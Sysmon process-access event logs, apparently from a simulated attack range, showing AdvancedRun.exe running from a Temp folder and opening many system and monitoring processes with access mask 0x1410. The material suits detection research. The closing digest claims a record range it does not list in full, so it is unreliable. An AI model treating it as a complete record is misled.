20:17:20.829{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079754Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.829{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079753Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079752Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079751Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079750Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079749Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079748Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004079747Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079746Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079745Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079744Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079743Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079742Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
Sysmon Event ID 10 (ProcessAccess) records from the Microsoft-Windows-Sysmon/Operational channel on win-dc-mhaag-attack-range-139.attackrange.local, EventRecordID 4079741 down to 4079718, preceded by one record whose System header sits on the preceding line and followed by the header of 4079717, whose EventData continues on the next line. Every record carries EventID 10, Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000, RuleName "-", and the same source-side EventData fields:

SourceProcessGUID: {834264DD-14CE-61EB-9F08-000000002702}
SourceProcessId: 4792
SourceThreadId: 1520
SourceImage: C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
SourceUser: ATTACKRANGE\Administrator
GrantedAccess: 0x1410
CallTrace (identical in every record below): C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)

Per-record fields, as EventRecordID | UtcTime | TargetProcessGUID | TargetProcessId | TargetImage | TargetUser:

(EventRecordID on the preceding line) | 2022-01-21 20:17:20.826 | {834264DD-DAF5-61EA-3F00-000000002702} | 3552 | C:\Windows\system32\wbem\unsecapp.exe | NT AUTHORITY\SYSTEM
4079741 | 2022-01-21 20:17:20.826 | {834264DD-DAF5-61EA-3E00-000000002702} | 3416 | C:\Windows\System32\vds.exe | NT AUTHORITY\SYSTEM
4079740 | 2022-01-21 20:17:20.826 | {834264DD-DAF5-61EA-3C00-000000002702} | 2860 | C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe | NT AUTHORITY\SYSTEM
4079739 | 2022-01-21 20:17:20.826 | {834264DD-DAF5-61EA-3B00-000000002702} | 2688 | C:\Windows\system32\dfssvc.exe | NT AUTHORITY\SYSTEM
4079738 | 2022-01-21 20:17:20.826 | {834264DD-DAF5-61EA-3A00-000000002702} | 2668 | C:\Windows\System32\smbhash.exe | NT AUTHORITY\SYSTEM
